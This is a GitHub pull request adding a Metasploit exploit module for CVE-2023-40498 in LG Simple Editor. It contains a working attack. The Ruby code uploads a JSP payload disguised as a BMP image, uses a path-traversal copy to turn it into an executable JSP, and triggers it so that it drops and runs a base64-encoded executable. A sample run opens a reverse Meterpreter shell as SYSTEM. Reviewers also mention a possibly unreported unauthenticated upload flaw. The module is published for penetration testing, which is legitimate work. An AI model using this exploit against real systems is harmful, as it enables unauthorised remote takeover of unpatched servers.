-
Notifications
You must be signed in to change notification settings - Fork 14.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add LG Simple Editor Unauthenticated RCE (CVE-2023-40498) Exploit #18329
Merged
Merged
Changes from 5 commits
Commits
Show all changes
7 commits
Select commit
Hold shift + click to select a range
1d9c7fd
Add LG Simple Editor Unauthenticated RCE (CVE-2023-40498) Exploit
EgeBalci 32f9357
Update side effects
EgeBalci 757e942
Update modules/exploits/windows/http/lg_simple_editor_rce.rb
EgeBalci 20a22f1
Fix check, randomize JSP name, ditch backup
EgeBalci 48cb2db
Update scenario
EgeBalci 3509193
Update modules/exploits/windows/http/lg_simple_editor_rce.rb
EgeBalci e286c96
Update modules/exploits/windows/http/lg_simple_editor_rce.rb
EgeBalci File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
64 changes: 64 additions & 0 deletions
64
documentation/modules/exploit/windows/http/lg_simple_editor_rce.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,64 @@ | ||
## Vulnerable Application | ||
|
||
LG Simple Editor is recommended for small businesses and sports bars which require simple content | ||
display or play-on-air via their signage. It enables easy new content creation by simplifying processes, | ||
and immediate playback on signage. | ||
|
||
This Metasploit module exploits broken access control and directory traversal | ||
vulnerabilities in LG Simple Editor software for gaining code execution. | ||
The vulnerabilities exists in versions of LG Simple Editor prior to v3.21. | ||
By exploiting this flaw, an attacker can upload and execute a malicious JSP | ||
payload with the SYSTEM user permissions. | ||
|
||
## Testing | ||
For installing the vulnerable version follow the steps below, | ||
1. Download the installation file of the vulnerable software | ||
[here](https://www.lg.com/us/business/display-solutions/supersign-w-lite/downloads/LGSimpleEditor_setup_v3_21_0.exe.zip) | ||
2. Follow the installation steps. | ||
|
||
After these steps, the LG Simple Editor service should be accessible on port 8080. | ||
|
||
## Verification Steps | ||
|
||
1. msfconsole | ||
2. Do: `use exploit/windows/http/lg_simple_editor_rce` | ||
3. Do: `set RHOST [IP]` | ||
4. Do: `check` | ||
|
||
## Options | ||
|
||
## Scenarios | ||
|
||
``` | ||
msf6 > use exploit/windows/http/lg_simple_editor_rce | ||
[*] Using configured payload windows/meterpreter/reverse_tcp | ||
msf6 exploit(windows/http/lg_simple_editor_rce) > set rhosts 192.168.56.109 | ||
rhosts => 192.168.56.109 | ||
msf6 exploit(windows/http/lg_simple_editor_rce) > set lhost 192.168.56.1 | ||
lhost => 192.168.56.1 | ||
msf6 exploit(windows/http/lg_simple_editor_rce) > run | ||
|
||
[*] Started reverse TCP handler on 192.168.56.1:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[+] The target appears to be vulnerable. Version: 3.21.0 | ||
[*] Uploading JSP payload... | ||
[+] Payload uploaded successfully | ||
[+] /nvFIE_original.bmp -> /nvFIE.jsp copy successfull. | ||
[*] Triggering payload... | ||
[*] Sending stage (175686 bytes) to 192.168.56.109 | ||
[+] Deleted ./webapps/simpleeditor/nvFIE.jsp | ||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.109:50097) at 2023-09-01 03:44:31 +0200 | ||
|
||
meterpreter > getuid | ||
Server username: NT AUTHORITY\SYSTEM | ||
meterpreter > sysinfo | ||
Computer : DESKTOP-LB6UGKE | ||
OS : Windows 10 (10.0 Build 19045). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 2 | ||
Meterpreter : x86/windows | ||
meterpreter > | ||
|
||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,188 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
include Msf::Exploit::EXE | ||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::FileDropper # includes register_files_for_cleanup | ||
prepend Msf::Exploit::Remote::AutoCheck | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'LG Simple Editor Remote Code Execution', | ||
'Description' => %q{ | ||
This Metasploit module exploits broken access control and directory traversal | ||
vulnerabilities in LG Simple Editor software for gaining code execution. | ||
The vulnerabilities exists in versions of LG Simple Editor prior to v3.21. | ||
By exploiting this flaw, an attacker can upload and execute a malicious JSP | ||
payload with the SYSTEM user permissions. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => [ | ||
'rgod', # Vulnerability discovery | ||
'Ege Balcı <[email protected]>' # msf module | ||
], | ||
'References' => [ | ||
['ZDI', '23-1204'], | ||
['CVE', '2023-40498'], | ||
['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-1204/'] | ||
EgeBalci marked this conversation as resolved.
Show resolved
Hide resolved
|
||
], | ||
'DefaultOptions' => { | ||
'WfsDelay' => 5 | ||
}, | ||
'Platform' => %w[win], | ||
'Arch' => [ARCH_X86, ARCH_X64], | ||
'Privileged' => true, | ||
'Targets' => [ | ||
['LG Simple Editor <= v3.21', {}] | ||
], | ||
'DefaultTarget' => 0, | ||
'DisclosureDate' => '2023-08-24', | ||
'Notes' => { | ||
'Stability' => [CRASH_SAFE], | ||
'Reliability' => [REPEATABLE_SESSION], | ||
'SideEffects' => [ARTIFACTS_ON_DISK] | ||
} | ||
) | ||
) | ||
|
||
register_options( | ||
[ | ||
Opt::RPORT(8080), | ||
OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/']) | ||
] | ||
) | ||
end | ||
|
||
def check | ||
res = send_request_cgi( | ||
{ | ||
'method' => 'GET', | ||
'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do') | ||
} | ||
) | ||
|
||
return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? | ||
|
||
version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', '')) | ||
return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown' | ||
return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0') | ||
|
||
Exploit::CheckCode::Safe | ||
end | ||
|
||
def generate_jsp_payload | ||
exe = generate_payload_exe | ||
base64_exe = Rex::Text.encode_base64(exe) | ||
payload_name = rand_text_alpha(rand(3..8)) | ||
|
||
var_raw = 'a' + rand_text_alpha(rand(3..10)) | ||
var_ostream = 'b' + rand_text_alpha(rand(3..10)) | ||
var_buf = 'c' + rand_text_alpha(rand(3..10)) | ||
var_decoder = 'd' + rand_text_alpha(rand(3..10)) | ||
var_tmp = 'e' + rand_text_alpha(rand(3..10)) | ||
var_path = 'f' + rand_text_alpha(rand(3..10)) | ||
var_proc2 = 'e' + rand_text_alpha(rand(3..10)) | ||
|
||
jsp = %| | ||
<%@page import="java.io.*" %> | ||
<%@page import="sun.misc.BASE64Decoder"%> | ||
<% | ||
try { | ||
String #{var_buf} = "#{base64_exe}"; | ||
BASE64Decoder #{var_decoder} = new BASE64Decoder(); | ||
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); | ||
|
||
File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe"); | ||
String #{var_path} = #{var_tmp}.getAbsolutePath(); | ||
|
||
BufferedOutputStream #{var_ostream} = | ||
new BufferedOutputStream(new FileOutputStream(#{var_path})); | ||
#{var_ostream}.write(#{var_raw}); | ||
#{var_ostream}.close(); | ||
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); | ||
} catch (Exception e) { | ||
} | ||
%> | ||
| | ||
|
||
jsp.gsub!(/[\n\t\r]/, '') | ||
|
||
jsp | ||
end | ||
|
||
def copy_file(src, dst) | ||
data = { | ||
command: 'cp', | ||
option: '-f', | ||
srcPath: src, | ||
destPath: dst | ||
} | ||
res = send_request_cgi( | ||
{ | ||
'method' => 'POST', | ||
'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'fileSystem', | ||
'makeDetailContent.do'), | ||
'headers' => { | ||
'X-Requested-With' => 'XMLHttpRequest', | ||
'Accept' => 'application/json' | ||
}, | ||
'ctype' => 'application/json', | ||
'data' => data.to_json | ||
} | ||
) | ||
if res && res.code == 200 && res.body.to_s.include?('errorMessage":"success",') | ||
print_good "#{src} -> #{dst} copy successfull." | ||
else | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Could not copy the payload.") | ||
end | ||
end | ||
|
||
def exploit | ||
rand_name = Rex::Text.rand_text_alpha(5) | ||
form = Rex::MIME::Message.new | ||
form.add_part( | ||
generate_jsp_payload, | ||
'image/bmp', | ||
'binary', | ||
"form-data; name=\"uploadFile\"; filename=\"#{rand_name}.bmp\"" | ||
) | ||
form.add_part('/', nil, nil, 'form-data; name="uploadPath"') | ||
form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_x"') | ||
form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_y"') | ||
form.add_part('1920', nil, nil, 'form-data; name="uploadFile_width"') | ||
form.add_part('1080', nil, nil, 'form-data; name="uploadFile_height"') | ||
|
||
print_status 'Uploading JSP payload...' | ||
res = send_request_cgi( | ||
{ | ||
'method' => 'POST', | ||
'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadImage.do'), | ||
'ctype' => "multipart/form-data; boundary=#{form.bound}", | ||
'data' => form.to_s | ||
} | ||
) | ||
if res && res.code == 200 | ||
print_good 'Payload uploaded successfully' | ||
else | ||
fail_with(Failure::UnexpectedReply, "#{peer} - Payload upload failed") | ||
end | ||
|
||
# Now we copy our payload as JSP | ||
copy_file("/#{rand_name}_original.bmp", "/#{rand_name}.jsp") | ||
register_files_for_cleanup("./webapps/simpleeditor/#{rand_name}.jsp") | ||
|
||
print_status 'Triggering payload...' | ||
send_request_cgi( | ||
{ | ||
'method' => 'GET', | ||
'uri' => normalize_uri(target_uri.path, 'simpleeditor', "#{rand_name}.jsp") | ||
} | ||
) | ||
end | ||
end |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I saw the ZDI advisory/ the references listed below only mention one CVE but here you're mentioning the module exploits multiple vulnerabilities. Should there be another CVE listed in the references? Just curious.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yes, module exploit two vulns, but directory traversal is the only one reported to ZDI. The second vuln is broken access control because the
uploadImage.do
endpoint does not require authentication. I discovered the second vulnerability while trying to exploit the first one. I couldn't find any CVE or related publication; It might be a 0day.There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Cool, after a quick search I couldn't find anything related to the second vuln either. There were 25 CVEs disclosed in the security bulletin and ZDI specified that the path traversal is exploitable without authentication. I say we land this as is for now, however when more info comes out if this does turn out to be an 0day we can help get you a CVE assigned.